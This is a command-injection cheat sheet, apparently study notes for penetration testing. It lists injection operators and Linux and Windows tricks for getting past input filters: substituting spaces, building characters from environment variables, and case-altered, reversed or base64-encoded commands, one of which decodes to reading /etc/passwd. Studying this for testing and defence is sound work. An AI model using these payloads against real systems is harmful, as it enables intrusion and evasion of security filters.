Command Injections

Injection Operators

Injection Operator Injection Character URL-Encoded Character Executed Command
Semicolon ; %3b Both
New Line \n %0a Both
Background & %26 Both (second output generally shown first)
Pipe \| %7c Both (only second output is shown)
AND && %26%26 Both (only if first succeeds)
OR \| %7c%7c Second (only if first fails)
Sub-Shell `` %60%60 Both (Linux-only)
Sub-Shell $() %24%28%29 Both (Linux-only)

Overview of Injection Operators

Injection Type Operators
SQL Injection ' , ; -- /* */
Command Injection ; &&
LDAP Injection * ( ) & \|
XPath Injection ' or and not substring concat count
OS Command Injection ; & \|
Code Injection ' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal ../ ..\\ %00
Object Injection ; & \|
XQuery Injection ' ; -- /* */
Shellcode Injection \x \u %u %n
Header Injection \n \r\n \t %0d %0a %09

Linux

Filtered Character Bypass

Code Description
printenv Can be used to view all environment variables
Spaces
%09 Using tabs instead of spaces
${IFS} Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} Commas will be replaced with spaces
Other Characters
${PATH:0:1} Will be replaced with /
${LS_COLORS:10:1} Will be replaced with ;
$(tr '!-}' '"-~'<<<[) Shift character by one ([ -> \)
${LS_COLORS:4:1} Will be replaced with :

Space bypass

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space


Blacklisted Command Bypass

Code Description
Character Insertion
' or " Total must be even
$@ or \ Linux only
Case Manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}") Another variation of the technique
Reversed Commands
echo 'whoami' \| rev Reverse a string
$(rev<<<'imaohw') Execute reversed command
Encoded Commands
echo -n 'cat /etc/passwd \| grep 33' \| base64 Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) Execute b64 encoded string

Windows

Filtered Character Bypass

Code Description
Get-ChildItem Env: Can be used to view all environment variables - (PowerShell)
Spaces
%09 Using tabs instead of spaces
%PROGRAMFILES:~10,-5% Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10] Will be replaced with a space - (PowerShell)
Other Characters
%HOMEPATH:~0,-17% Will be replaced with \ - (CMD)
$env:HOMEPATH[0] Will be replaced with \ - (PowerShell)

Blacklisted Command Bypass

Code Description
Character Insertion
' or " Total must be even
^ Windows only (CMD)
Case Manipulation
WhoAmi Simply send the character with odd cases
Reversed Commands
"whoami"[-1..-20] -join '' Reverse a string
iex "$('imaohw'[-1..-20] -join '')" Execute reversed command
Encoded Commands
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" Execute b64 encoded string

Tools

  • https://github.com/Bashfuscator/Bashfuscator
  • https://github.com/danielbohannon/Invoke-DOSfuscation